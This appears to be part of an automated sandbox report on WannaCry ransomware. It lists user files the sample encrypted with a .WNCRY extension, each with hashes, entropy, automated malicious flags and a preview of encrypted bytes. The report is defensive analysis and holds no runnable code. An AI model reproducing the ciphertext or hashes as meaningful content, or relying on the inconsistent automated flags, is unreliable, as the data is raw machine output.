                                                  Preview:WANACRY!......q....m.......b.Z.i.R..u...`l..x....y.H^*.........Q........)....NZlP...o...?....p....H;s^.....%.....w..i.t.Q..+..]..Ot..?..040....C..a......i...aD.L#.l....b.(.V.!D.G.R'..\:+.8....."..n.yy.-=.[.bWA3.o...F<9s`.Lk.}G.b,..Px.|.Go..;Pk.Y.6Q...............W......~.....O..... .f.6:..r6..B.h...1MSi31..Kg\r...dJ.w.Z!.6.<.,.....{h?K...Z...%6.Y.i.)lk..T...y..3._.h.&.:OJ.3. .*...;.b..j4......=8.M."]..c!w.1..vo.g.~..k.@....-.#.a..P..z..SN...0.!....Z}Z[......P ....I..%....(!%.f..PN..~c....O.&.<.....$...7k.{.:...L..1C.KM....M.....A..D.P...p...h.........Z.g{v.>...<>......%F7M.).U~.z.g>$0.(h.~.a..|u*....m.c+_....31G...#.:^.~vh..IX..r$G.~....~.<.ka.r..0d..!...C..M..[|....I.?.&.Sw.......p..(3....S.......[j.....E.''.?.'...I..he\P.z.#.1..2.....Qn..`~O......3.#.H.-`..lB.. .9.f.K.f.....P#..MB..<fL.b.^y4.U.Q..9..ra1....k......t...Af2..y......}.[...G&(.9.8..}j..-.7[.R.[:...al..R..dG~Tb?Q.)PzwW..............P).4.........5..%j'...a..3.kZ.......D.H.%..

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):51224
                                                  Entropy (8bit):7.996723736114971
                                                  Encrypted:true
                                                  SSDEEP:1536:E7R57u1znHt/KUS1P8mibeFZWGPgOFfi67WFDdhO:Y57qzHtRSybYQGNfWFDfO
                                                  MD5:D2A69098216F1E7CB56EFEDD22994078
                                                  SHA1:CCA5FA954B1854F2881283F1CB9827591416C2CC
                                                  SHA-256:32AC09FC100F5209C748052BB8F505E6854907C104852BE933C9E7F4BD105080
                                                  SHA-512:C9E637A4A4389CDF6A0B1E05FEBC9D9123EE7126B6219B578D26CA0B56F43C99275AB64248560216B75D9329C363AE113195B0732A0668C668DEABBC22762C53
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......-.-.lOE...R.I...~<.O.e?<...D..+...S$..............X.*.C.\.^.....B#.....).qq...l.i.B.d..X..X.......N.R?2.p ~.,...[...C.9.<....A.Y.....G1.BM'ko'.D..Y.L.z..... G...y.....c.W...*...<.[..i.h...{_.^.. e.G\6....j-...*.fL.5..H@..t..i..^&.......J............&."e.......V..570.../p.......F....r...."::.b.T.;.p0.A[.EO^l....@.W...P..a....v...i..D\Z.0..|..k.L9......a.......*...m......SF+iHC\(:4%i.....2c...6Z...fRdg.:.h..m..W......WBU.Ut.>0U...t@=U.S...q.%.Be.J.k.........s.o0...=...T,...T..f.:.?..|W.6..WH..$.5.wI).07.N.p...p.rS.#p..j..c..P.'.._.!`.\...:.....)0u?B.:..r.Vi...APA.... .3.y...F.85m..kF.|.......@..4.VoW.b..EG.O~U......].u@.x...zz.......j.W.k.}B.V...>\..v.`.M#.....\......t..`.Y...l.x....1..RL../p..H_....G......4..z......Pa...'.cl....DJ...=.U.t.9.....U.:.0.......DI..]j.z..+k\.:.......<.)Z.n{.t.{.'.@.f..Gz\....=..uf.......mh...`.....2.?T..W..:..{......:..Z+.A]...S..\Q..?......'o..,....#..b..`..5@..q j1x....h.ky.N.O....i......

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):69016
                                                  Entropy (8bit):7.9971435479437964
                                                  Encrypted:true
                                                  SSDEEP:1536:IEHB0qJ7/1yx73Ka8vAnCpSFhgPkmBRzKKpQh2CBe3j:PHeM7etngPN6KpFCBe3j
                                                  MD5:A54F8542CDD6E107C8CA1ED474E5D21E
                                                  SHA1:5417D163CCD916463A93512DF9984A57C15DD98C
                                                  SHA-256:2D8959B5644CAFE23F381D7A187F24EA63BC69AB04071C42849CAE907303CF60
                                                  SHA-512:2C84AE9E4151B41690B785BD80321E6B37DA1E8C1D7472470B0DEAFED3C9F353FECBA2EFCB41831787952F3903549B9CD33D460D0776CDC2BF3C709389E342CE
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....U%vW........*.. r/..:.\O.]0.|..g.TW.x:./. ...k.`|.r+..p{....Q...fp.QTo..R..o$m...{m..8.i.d.S.yrme.....h.=..b.5.2.C.j......{.Gl......r...h.d...qQ".t*_.bM|..). L.i....I....w.P9..?).e..y..............3O.x..)..-...A_C.;..A{.w=....yd ...&.C4..!.......t........Y..ix_..a.4*..^.U....bSHL.8]!..3...R.L.!...AI..u_....E......T..=..q..!..{.n[ivL.....!.m.........L9...V.h.>..2...u_.sh.i.+..Iz.......v.[..b.w.@.*C..I.l...[as+....+7...yc..!.|X..:....;...N.|..U..W.]5...(...W<.1....I....t...*..I.l.?4..z"...3=...=..rRQ.....1t...+......HO-.e......n.0.......r..,.1 ..M$VH....z.G..Q.......':......>.yw1...Ak...).....~....K.t...y"K...I.......a..k..Q..z...t[....-..m-._.fV..s..@.....7.Bo\...j.........2....u.lu...\....H..e...V..[:....7C.5.6.x.'D.ynh$.,.X)...O.E.,`]t.j..L..........$........5..X<...3Q|4.0%..ZHe.........V.$f$...eq..=.B....e...s.4....Q`.&.~?.6.....0x.Q.=1..q'.#.....D...)WpW ...Fr....=...{...A.../...!..5..".......1.....i..O.Y..L..d..W9..".8TI.

                                                  C:\Documents and Settings\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{730830dd-534f-42c8-8160-bd245bf51290}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.99442180691795
                                                  Encrypted:true
                                                  SSDEEP:768:QYJzKY+0gZhJ9CLredbwYaAqOlLQHkKKvhErLsRyK9JObXjNdo+B:QY4YnLreDaYhcfLe9ObQQ
                                                  MD5:56ECFE79CBE829895E3A51E39D133C28
                                                  SHA1:7B8C9DA54FC6B7CF78CD19BD65D18C7BF9E17926
                                                  SHA-256:6A69082DC1E4757C6D1A88C9026500B47541AE8B6582275BB9C7471E1FBF594B
                                                  SHA-512:888D7F9F1225D96913B00C51BAA37D30C1A10E6E8C4D41AF7FAF85353EB2DC25CE695B1A8E378C5C030E8652EE61633C3AC3B05FD22629ADEE384EABF74A7E85
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....c...'s....#....R.D..7..E1 :....x.&v....i#...tF..R..N.{w...Y|: ..a....X.........k.T..p7D7$K..c2L_.`.#...{.........=.$...^.|.].vd.(........V...f..9..)......FC..l\..Uu......d#... .2...%.\.]kP.I..}...G@&...5..}IL5..:..L..Wl.c..j....h...H."..f..xWV......v.........+.9..rnLvE7(.2k.....OKF........+..C....,..3..h{.Lc.9.E.:....TN.M....\.......Dc.....7......c.AnCY.;...>Y.w.1......<.z...(..a..m..................3.)..K....y5.....~.Y\7..0....6p.T.`K..Y"......z.<!...g.w....3s....'I..R.H..q.'0..S.y.Z....H.: ..L....X.^X..-..;.dMh&..H...s.......$.S.#.r..9..6.t.../...6.......... .5.$.VU?.-..{.\../Au..htj....:...P..m9l8.eD.N!..S...../...9..s..z..|.b.p.}6..}..G..x.....QEf...(q-E<..Hb+.>Q./..M.h..l3.v......$..D..r.%.RN...>..`S"2.g>...d......1x2PN.Qi&...h.....;#].f.g...T.7....!f....t.n3VHv*..... .l @w..\\.....*..R.>.....O...;..PK...~XDN..]a...J.a.....8...`"8...I...`+.j...o.....J.._.F...&4).6jm.2.4O..1..T>.........^Is....b.~Y....B..}Z.)i.w.r.m~}./.~.....v

                                                  C:\Documents and Settings\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286129748497427.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998232436732257
                                                  Encrypted:true
                                                  SSDEEP:3072:M6LximSsgSdFi3NO+SIzP9eUCp9sWnh9oYF7E:ZNiav2NOWP97uSej7E
                                                  MD5:3D4A4588471E93890C28287305B326AF
                                                  SHA1:252D9CDA8609EED48DBFA8515066CBE33D1CD062
                                                  SHA-256:0AB0EFDAA75BE866AAFE115686BC67DC2D0A555E4B5A7995D9193A39D76423EA
                                                  SHA-512:2C2D9E757ED2C6A2C0B1118F6ED9B9F347AF1DBA9568377F82F5FB5C94F7F49D824A2E88A1F39ABE65E0F69865AEF9DC006E9A6FD2AE27D83F5C24B3937BCF1B
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....o.!..-.-.,Z.3....4.y....!.?d....;.....!!.UMX&..`s..*..RKY.q.i......./yy_......[.o.}.._^..n.....L.!.D.^.%lepD...y.6.^#l./.....{..E.c..i.&.....5..w*.....Q.Up.!.$f....%-'...@t..y..H....p.......e.#7...4.....^...E..g..(...7q4.A..`E.Z8..).;1i..............wcK.i.....0.q.....gZk.Aw....2(.0.S..t~....BKL..2k.,..z.O.X...|....$.o._....c.0@n..\.y.u......qi.JH....5cw...D...`+...=E.:;wE.R....^...-..)l.UQh..u.C...=R:...x.....,P`0.+b...6...e./.=/..j)...].....2....l...Q.^J....G/..;F..$.....o..C$[..D\.......D.Cg...;...:.1Z...V..._.Y..==.z......ik|....F`...k..{..K~.E.4A. .....&Qt.$..V.p<...K.78..!.WYT...`....j..w._..........c...Q.).@\.z.V'..=..!.g.QA.~.....b.V.!Q.n..<........x.q.k..Q..i..p..fy..2...qo...l..nX..}F..t...W...7...jk..M.~E..?...=...?.lh...;..b...C3/v....!..MPGT......l9............Et...o.0..Zv..X...~.L.&.H.A+..+C.5.y../.N._.v. ::.2......w.......x...bL@.:....N.\..H..P"../2......[.:.z...k...C.->.q..,..=o'..h.J.H.z..].h.?..W........

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):47576
                                                  Entropy (8bit):7.995573128949923
                                                  Encrypted:true
                                                  SSDEEP:768:nxSYRE9wQiDKzvwnIw9PXoAjpIUITVjsfcZdWuY849gtHePXeCBZGlsw7:nxSYRywQiD+gNYAKfFsfidWuY/EePuGC
                                                  MD5:7AE06D3A2A33129BE655F73DFE1EEE25
                                                  SHA1:FC308CB65908EC76565753C1F2CBBE8FD4C0D657
                                                  SHA-256:5DDB2D4CDC55877DF22C81133810CBE2B4EF5D20C0893E34BB98B8C1233B3DBF
                                                  SHA-512:D65C28EEDF6B886DC0DD742EAE979C0240B3057EBAF04A98C9D34CF8C22B5883C1BA3D08DB590CF5C51AD99280AD7BA22AE46C8145022C938AB209A4A45C4F5A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....8.\.%...8....7.E.'6..JG\....>9G..c.2.`..f......~...(m......J.|....{.G..Eb....P|.....Ec...6..A...O.9bl.@...d.P......'U?\C...*.....3.#h...KA.!.[.W.*...7a.%.D.^v..3u>.6.Jp..M).F].J.Sw..c...;.lw...n...e"...y..,..U.......z.5.|.K)..D..1.uIN.M.....%...q.H.............j... .5(.-.u...U>u....f@H.k.w...5E.r....9..h.L.m/.......3..a.m....#...S..X..9U....9...B5.~...kt.z...B..g.M..|5.r...e..A..[...O..%|W...2.!xR.P.+....(...cb..z..2.@.G)s.a.ib.2...c.k.].....;i....{.....iN..K.>....-A...S..hq...#$"l...(....a..IL...`.m.*|.1R/F.Cu....N....WO...t.....B?.l.j.C....Hu..i...........d.&...4.;s.....*.....|.K,.x....v%...J.=.,Yy.o...C}-&.. .....L.OC..@ ..ER.WV=x wd/.i_1..md.......F&..p;!..^.;..n...4z4..Hv6..nP.;~...d?.y...W~J..@+....S...9............3:.6..-."=.,,.u..QY"..Y...k~m.6.|.@.........t[..........J./..{LB...b.d:./...BX......1M[.S.B.(..<..TH.&E`/....(.....*5.,.......k.Rv..F.D...(..!.........Y....H......`...Ep......~.ow..v.S#2.;$.3....<H.J..U.r@..S..Bs..G...

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\AGWVMYQACF.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.84259899688765
                                                  Encrypted:false
                                                  SSDEEP:24:bki0AYEPN+e6HPqsB9dKqA9rMT4G+ZX6lbynTEOGRVEZrP1HTmZx4qSxiIgNi8Mw:bkBE1WNBSb9gmibyniVEZr1Tm74tg48B
                                                  MD5:26E1773DF0D57A0D5329EBCF799C64BA
                                                  SHA1:54015B652E0EE556962EA23A7B75791785FAEDC6
                                                  SHA-256:10961514909239FB8A548700823AFCFD85D9E59F9425A06B45B5AE21BA9EE31D
                                                  SHA-512:DD206089AE7156D2277338409C4A02B6CA3CFE59F987BF936D2E3D78572DD8A379CA8E99022238E380C2A2EBEB432E8B2AD9089AF6BB29B85AD7BB60A8172191
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......>].KF....C...q..b...KP8*...a..'.w,.+^..c.[.li9X...+.G.Z......n*.]+H..[.=.u...!>6.4...9}.q.}`g..E...z...R..z.cim.#B..:.yXD1gyN...(..(&gL%.....`.....f....b.SS.D.j~.`3...H.|..P;wH..mY.........I.4J....O#.5...._.|g7UD]..B.F.>.o.V....?Y5..|...7|j................-.ykC......A.s.Wm....0U..$..s{w`.~.6....F.sU.H..J..C..x1MK.;..........rC.b...-$.)..?...(......R.....[.>.0)gQ.]0k.3.+m.V.A.....&N;.0...gIE=..QR.....)..H.q.(.'...v..........C.....Nf.....$..4.W4..~0.T.....J.C0Cn.~.!.....KF.x.e.{^..=...+~...Of.C.P....Y.fr...p...Q..%-.:.B.f..o......M4.../..EK.M......bZ+.d..J.'.>x..... >...8.;....!w.Znr.......TWT..#........c...t./.u..5.)..e....O.(...!5...a.3....;..Q...(.H.%{..IK.&....._...d.W]..i]...!...i.Z......b.S..By..VO..ra.w....N[../D...}.B.....^.0q.!,.j.L..K3../F..d..s..^..x9.7.l.:;.c......Yx*.h.b.$.?.h.0.#._&/9.-2.C...(.;_oM.O.5.o.w]..>!5..]....^I.r........>....<.....Q...1V...glY;...7t.t..!....4.m......Pa.).......|.]lZF'.qW.3.....?K.!..

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\AQRFEVRTGL.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.860896880517714
                                                  Encrypted:false
                                                  SSDEEP:24:bkN3n3zjWVj+AtfRfhtUFjBBRBl+PAO/qrjTAn8uOmFiVPof5n:bkhnWEAttht81+d8f4vORiB
                                                  MD5:23F4EE5EB0D36FF8F48090D6DC5EB616
                                                  SHA1:2B01EAA57CB1D913B6D46E5E4A43032981DAF997
                                                  SHA-256:A41DF67A2D3E4D7B5EB05EC38B5FB98AB6DDB1F8CE5E073324A45A818CDF389B
                                                  SHA-512:3B67C7BD8BBD7493287D4F9FCFD4EBA3485EA969948AEDC782F236B2F50395AB398B87B7EEDD45D01F68EBC84F395839D01051968639B78AD13DC108FE24464C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....R....0.|.t.k..._......\6.'.?UN...$.R-....0..>.R...J.m..&..u..+r..An.zO...l=......i.OP...\%.SC.k3yT......}..%B|].........l.yQ*.......:....g./....9.fK.r' ...d...{(]..+V.[.7.8:......-#.(19..p.7...I....D..ZL.%.j)T[oUIp{...d.w...._....u....B5....2.=..W.O...............Z...Iw....f.`.+....*Z..3.8.'....x/...o.......>5=o.u.H.C..,. 4.8.j.3..@..DN.Z..(.j(.!...b...?..X.k......u....>.Ir....:.h;...a.s..7.....r..+-..^..g.G0.H....r.2j..!n.@v?Z..Y*.ILBeM....P. ..x:*^...k|..I.P1Y....wf.gh.Ep..,M:..m.j..G.Z[.\$k].m.r..@a.2.....0....Y . .i.I..KI5wI..s8.....N..b..u....l.B#g.@.<&~7..A.../...>.I}.0..Y7..z.l......V.L..\...,>sJ...g.a..=...L.7z....)S.Z..R..W..B..Z....>..A..P.r:+....+....;.X...[....o..D.5...1...j...4..!......f..}.'....c.&..?...4...K'9..WHFf....E.V..to`M.fi..c..V..8E{......E98.....wc.bL(7L...6.....+....f..}}<..|.J....M. .x....f#.....9... .+......e...zO.}.Q.".3o.6e....J...(E%.....tz3%.R.:............Y8...t.G-..e0..or..y9.P..o..aH..l....d

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\AQRFEVRTGL.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.829347230978042
                                                  Encrypted:false
                                                  SSDEEP:24:bkicUDYnRFVR0V2MYt9NYGv1+e7KT9CIQUFoKp6wjFQuyRuXH:bkiV4vWAMYnNd+eU6U6O6qLXH
                                                  MD5:FC0BD4C904E73F1190969646CC27922D
                                                  SHA1:485B96E303525DE91637D83438667C7F5EE3011D
                                                  SHA-256:205168E635F759BDE8E388A25679729CFA5133AD75747B4B09302E365AED4D3A
                                                  SHA-512:34A226EEDD6CD87B927C6EBA0C99C5595B04F4AC9C46D765947063AAC0C1C4D7D8480B5B6FB9E62DD9099090CA25AEE938296B84FEB79CFA24AA900926F3B5C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....`.@..&.F....,:C..6O. U....O...s9...n....C.....scg..~.. :.....N....C..D....F.K.+.f..mF...R....e.V..u.~}M.{.f..i.x.JF..Z.Wz..Jb....>.....X\I..^:.......ZE]...3..N.T*b.(..[C.........s.a.b...'^...].,.g.y.....?].r..iW7-68M.b...OJF..M......F^...C..%................Pf..;......7H...QU..o[...B)...Z:.>qla..?u.xs.<.X.D|.9.]_K.a=v.X....($..Q^}P.p.%.7..K.~."..j3._..8.I.a....f..o...4kw...c=2....X....k....c...wm.....2.....0...;>.{..{....Z..WV..*..p...y.-...C..R..r.S...]:...dZ.Y.'.>.'......vOH....8.c........s.r...c^..\l..v......je.mtF.....W0.^.(.;W.c...e.7..?t...^."B.Ky...N.P....S.*..o..U....E.......y....jX ...GJ..o..xJ.......(......58$:..c.hgp.~.}.7....X..........".uNQ...c".E.......=.}.......#..+.......:0.....u.>....f....}.?.1...Y......>.v....n.,.3..u..v..i.V@.%....)0.w....nQ....Q....q2 ,./...r..nc.1S'ie#|...\#....._...z+/m .aM_aE. .,.....}uiQ..........\.>.O.x..QT.Z.wW..%pXo.a..P......u......)P...,..$...`*..0...`...=...H..j.?CW.#..9B.....

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\BNAGMGSPLO.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.857904470184713
                                                  Encrypted:false
                                                  SSDEEP:24:bkXn7xZ0Ad7xV1jkKawlR5cj4Pc3b+IwynbiJwugWJIWeLvVAKL8f1:bk37xWEV1le4Pc+WbvrsqrVjLo1
                                                  MD5:01458964CEF4986DEBF42AF943035EB8
                                                  SHA1:87F76042C2EC1DB94F0F1CB4A096777EFCFA32E8
                                                  SHA-256:E24CE91EC3B691E2769C9DF97B7FC2608C03934FDA5CFE000CCC7CD18F39B728
                                                  SHA-512:6637DDDFF48AB09002C4B641041143EE2002D0C962930E66A1D7BD1915B5A131A5F4FFA9AAA1CEC0FC0E8F466C8C56585B6D9387874493716D4EDBB43F33CB25
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....+YA..`...Y..T...y.R..;S..,B...."...).w.+.O....X7.M.QY.v...1[$.T.......j.~.....?Y...U........J...W.n.Ab......KaC.....wE.l.o..{'..r.[w....s`...K[.1.l#.tM....$...g...u...~8.z.2.q.....s..p.F.!....4....f?.Q8..........a[..`....p....y.V!>.t..Gl..l....'.H............e....a..@..........]..I....>.%%...\U+.Z.X......2..%..J5..|..._c"...!..?.T..O..G../....:A/.o..1;ZB..)W....G..u.W...\hV.J......s..<...Z..:_{.A.-Q..`CP......Hg(9^o...K..}$..n.nu..).]*+'P,..2.W......P...X;@.......Y........Y..b..b.?...K.N.=3=...T4...H?..dl..^{...v.U..:..=(.H.R.`t&Tm.......G...<w.Q..[+.. 8p..N.....Q.v[......pt./.l..j.Op..Q..9.h...D"..F.P.....u..l.#.`....$..x....._..%..3.PF..D3..k.K..V\...D........E..\..e[.lg......?..~B.....z.1.GZ......z61......"..Z.F..A..^..U.&..9..C..g.$.......s.~..=Y]../pJ..b...{...6..w.T..:.;!.!;.N.._.j........S........*|.~.#v..0.Y..@....d2.{.&...........$$y...f&I..bB........]..Td.....<.Z..%..[.....q.[.p.2.M..+W6m.....6..[..xA..ycx..N.OB.,V....+</.

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\BNAGMGSPLO.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.876329322149963
                                                  Encrypted:false
                                                  SSDEEP:24:bkkIbQ8k1oICwZeLo0/YxqrAWB2M5nB3ZVtMlEgMfioTLvTO0zBoaV3Ckfkt5mur:bkH2KICwiolQAWB2M5BJVYmfiWO0zBo3
                                                  MD5:C18D3E4282D1EAE5099745210978B5F0
                                                  SHA1:C3FBE7556D9EBCB202A71C180FBEDB4862E970A5
                                                  SHA-256:51AD103B5AE50549F4C8E810D64FFAE70048144530628B8EF7DC86F34C8C5F16
                                                  SHA-512:4D2A0DF1D0C116DF28414DC25DE1444B49241FC1C6F130DDDB1250512608364B58C748C5CCF877490DE0E5A001A5897931324DD56CFC6E128FBC52D8C0E91A39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....._.5..}.kG.I....!..a...Y.........*f....\.....9......s.<%..r. ..[}#W.J.c4.J'.(q....i.H...v..w..5.\g....b.c1..._...6....cHQcu...w.t.W!...^.%...'.t.zJ.>.BNn.{....q0.nm...Zm.o..u..9g>v._..Y....@,C.=..Vj-..P.Q.W..?..|-.i....{..m...|:u......;................K.S.2.JW.gE ...OR.kRRB.Xd....A.I#Y.....c..y.p.*..^H_#rj....3......#..0m...h..bU.\..O.w8.......%.a.....*...5.x...[...B.....D.X/..(.J..E....@\....*..m.....B.....Ig..3.....K.h......s.....{pdd...a..........5.}....9\.....+....y.e.a.2~......5.T.)...Y.GEU........#.f.._......R......!?1X..FT....m.....?~..s.t....l.......?.l........#a.....".....K....).#....g..6....>..(.......Yl..~.v!]...k.....:k=.iz.8.j.u@..N..ka..0b..E...Vv.a.j~q.R.....X"|......O.v.,D=..]g.Q.......-.#l(..I..7......;y...f.M...%N.=.....n.6.t.......pnPY.....;...*2.=i.]./p..c.8&..WX&...X.:.+...p^.bj.W......>.e`.|.....6k.1-..3@.7.?.j.Z...Rf$..E..Eg.u..S&.4ls....QM.v.....{....Yp........w(.1O,.O..ZhT.8...Z.......

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\EFGRWFCUWS.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8490804436733015
                                                  Encrypted:false
                                                  SSDEEP:24:bkijrdPDW6uS3J6NUxdYn42kz1syIZAWMYSxfw/w9gWCcrR56GQ2vbeFuQxMdT1F:bkEJ7W6uS3JfvS4n1vsADYSpwI9gWCoz
                                                  MD5:0912848A8EC8E4FCFE23EC0A39A39076
                                                  SHA1:D26D4EF538CA5D418BCB085C79F5DA2B7C122F1E
                                                  SHA-256:4F5FF33C191D2399D77D0F11F314F83E28230A51A143C37A566F1C1E1F3C67DF
                                                  SHA-512:F353CE89AA50A9CF23FC55D81F13277201D3562AE39FC1E968B95FFBA0406EE6850C020B245B068F9E30F9412135A08D04F9FC11F9C01EFECDA6B74BD4807DC9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....D...6.=.).q...oBo..@.r.....A.,.g..&.?....Ucy<..5G..1...n>F..^...O..&3.....G..&..X..1.:C...X...H.I.qTX..s..wmsg.@.`'..L...*,.N.....U..rX.....t..>..}..j.zU...+.......N}HB.\.i.....x.'.T..b..'.[D.b...2....x.'....x.....8S.k..iP......P0.u.Q.>P................f....v.....06..I..A.....F..122..Z.ly.K^.S.r.y......c......T..5n.E8U.....f...<,...n....S.F./>z.3.(2...rQ..I.Kc....D.....R..?.3.U.Lt.uk4.....l..Ez.5.<.n.....z.F;.gn.~&l....(.S.s.f%e.Eo.[..>..c....R..(.Q...7..c8....M...e.O..IH%...o.g..7....\...Q../B.y].!l.vn...Z}.G....!.kE............O',..}.q..Eg^`%.m....)o=7Wo...53.r."T..8.ID.bN....e.T..G...Z j.].....2=S.9'..Ri....b[...5s..c.v...h..c.g......33..........(.l5^.t...-o.l.(..K.z........~x.=..+_..o.;.1..j..@..6.L.T..Q........N>.~....E...I..PI........... k...6...(.UH......s...6...6R..O...EJw.b...t.%...\.:n.p............}..d..m].....LP9....w...I....".bb\.@.-.M...0.g3z=>u....{\....w\..At.{,ZC.*J.X.G..:40..8.....n...<...w%&^U;.}.9Lk.

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\EOWRVPQCCS.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833933403557597
                                                  Encrypted:false
                                                  SSDEEP:24:bkFIMVk4uyJw8PFqwNzCQkfN2POUuDhSVadgLCjII7PXuXZHN0jZGQ/RF:bkFIqk4DL9qwPzPOhhSUd1IIDXu7Mx
                                                  MD5:5F1CDF029ED0D7EF9B00362641F078CD
                                                  SHA1:996C243299659FBBBA80EE85FEDD3DBECEB1223A
                                                  SHA-256:ED0529FD9DC8C0CD489038D42F8F174ADBDACB000DBA6BD4C16FCC016FFF125C
                                                  SHA-512:772AF2D08C1676EFE93736ADAD5FF84E5376B4073539D1EC3BD06EEE652251124F154CDC82A6A1FE69FDA5919C9A0F1E9AE26FFCFBC1B75711F47DBCC7FC4A54
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....6....z....f...y...EM0x...r..1..C"R.@.m..[_.b....Wn.#..Zj.... .....L..... [%>>{H..../..pq......i..2 .S..R..#E.@k..9.29..1 R..K...9l..V.A.....:..Wc..O...<.3......(DU..9o.3}.(..2.."1.*.H..c..35.J.r./3S...%.y(..u;.>}....5+...8.....Y.....%..%..6.E...............~e..........R.............h.s....$c.........Y.......0|...SM...k.....I.uaN.S..@ ..!....{S.5.Z..i.;.S,[...yQ.*.}.+..W.B....C..?...g4.....&..N..#.....}r...i'x|.!Q@I<z\ ...Sk..37......`..OT....k..<.k......K..-..b8.(..a.....\.7x...3......B.u..j.n_..EO>..JvPW..ll.......H.n.../.iF...7...L....D...b.X.gB.D..Rd...{.y....n...];...A..#....$..6T.......Q>..r...;..!kZ.K...7.z.:(.o.....|.m.......4*.....Y..C+..1...h...:V.j.:5~58 .........-.:'..EgH.t".iE..|1.IW.[....e.....).*m..g.M.....`.N..0s(.}.......=.{j{K....p.1\.O..%..T....n...Y.S.W.-.{.@#I..J.f*......xT.!?.R....4.j_.v+A.....I.92GS...o.E....FG.....pm.5....|.d[..3......j....e.4..p%............DU.........nY..7..a.......4/E..+......x.s:0o

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\EOWRVPQCCS.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.84403982408391
                                                  Encrypted:false
                                                  SSDEEP:24:bkhPO434FHXO9ucxngY+oNI6t5pT1hbM3L9jeN2fE/mZGh/BAfBLTwa9:bkhPO4GXOccxgHoFx1hob953kh/B20O
                                                  MD5:6D170AC6673840205D713A35FB6EABE1
                                                  SHA1:9DC6E03C127224084797D532AD28EA1FD4E82757
                                                  SHA-256:1CB535883E423103E9F271F7EF3488737E5FC9BC6FF8383E1385C7E202D9BF83
